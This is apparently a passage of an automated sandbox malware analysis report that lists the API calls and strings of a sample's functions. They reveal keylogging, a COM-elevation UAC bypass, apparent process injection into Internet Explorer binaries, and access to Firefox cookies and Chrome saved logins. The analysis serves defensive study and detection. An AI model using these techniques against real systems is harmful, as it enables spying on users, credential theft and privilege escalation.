GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E

Strings

C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F6BE
ieinstal.exe, xrefs: 0040F6D5
ielowutil.exe, xrefs: 0040F716
Inj, xrefs: 0040F769

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A

Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

5, xrefs: 00419809
2, xrefs: 004196F4
VG, xrefs: 0041968B
3, xrefs: 00419754
1, xrefs: 00419695
4, xrefs: 004197B8
7, xrefs: 0041982A
6, xrefs: 00419813
0, xrefs: 00419651

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[+] CoGetObject, xrefs: 00407561
$, xrefs: 0040753B
[-] CoGetObject FAILURE, xrefs: 0040758E
[+] CoGetObject SUCCESS, xrefs: 00407595
[+] ucmAllocateElevatedObject, xrefs: 00407508
Elevation:Administrator!new:, xrefs: 00407542

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA

Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
GetLastError.KERNEL32 ref: 0041A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A

Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
IsValidCodePage.KERNEL32(00000000), ref: 00452777
IsValidLocale.KERNEL32(?,00000001), ref: 00452786
GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED

Strings

lJD, xrefs: 00452745, 004526F2, 004526E7
lJD, xrefs: 00452639, 00452649, 00452709, 004526AB, 004526A0, 004526A3, 004526AE, 0045270C
lJD, xrefs: 00452626, 004527C5

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: lJD$lJD$lJD
API String ID: 745075371-479184356
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69

Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
FindClose.KERNEL32(00000000), ref: 0040C47D
FindClose.KERNEL32(00000000), ref: 0040C4A8

Strings

\cookies.sqlite, xrefs: 0040C409
AppData, xrefs: 0040C358
\Mozilla\Firefox\Profiles\, xrefs: 0040C36E

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B

Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371

GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68

Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Strings

8SG, xrefs: 00419BEB
PG, xrefs: 00419BD5
PXG, xrefs: 00419E2E
NG, xrefs: 00419B25
PXG, xrefs: 00419CC8

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: 8SG$PXG$PXG$NG$PG
API String ID: 341183262-3812160132
Opcode ID: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
Opcode Fuzzy Hash: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32(?), ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
GetKeyboardLayout.USER32(00000000), ref: 0040A429
GetKeyState.USER32(00000010), ref: 0040A433
GetKeyboardState.USER32(?), ref: 0040A43E
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID:
API String ID: 1888522110-0
Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6

Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
GetProcAddress.KERNEL32(00000000), ref: 00414271

Strings

SHDeleteKeyW, xrefs: 00414260
Shlwapi.dll, xrefs: 00414265

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
Opcode Fuzzy Hash: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA

Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00449212
_free.LIBCMT ref: 00449236
_free.LIBCMT ref: 004493BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758

Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D

ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
GetProcAddress.KERNEL32(00000000), ref: 00416872

Strings

!D@, xrefs: 00417089
PowrProf.dll, xrefs: 00416866
SetSuspendState, xrefs: 00416861

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE

Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513

Strings

ACP, xrefs: 0045245A
OCP, xrefs: 00452490
['E, xrefs: 004524F3, 004524CA

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$['E
API String ID: 2299586839-2532616801
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398

Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
InternetCloseHandle.WININET(00000000), ref: 0041B41C
InternetCloseHandle.WININET(00000000), ref: 0041B41F

Strings

http://geoplugin.net/json.gp, xrefs: 0041B3B7

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
GetLastError.KERNEL32 ref: 0040BA58

Strings

[Chrome StoredLogins not found], xrefs: 0040BA72
[Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
UserProfile, xrefs: 0040BA1E

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE

Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
OpenProcessToken.ADVAPI32(00000000), ref: 00417966
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
GetLastError.KERNEL32 ref: 0041799D

Strings

SeShutdownPrivilege, xrefs: 00417972

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
String ID:
API String ID: 2435342581-0
Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98

Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9

Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
_wcschr.LIBVCRUNTIME ref: 00451E4A
_wcschr.LIBVCRUNTIME ref: 00451E58
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB

Strings

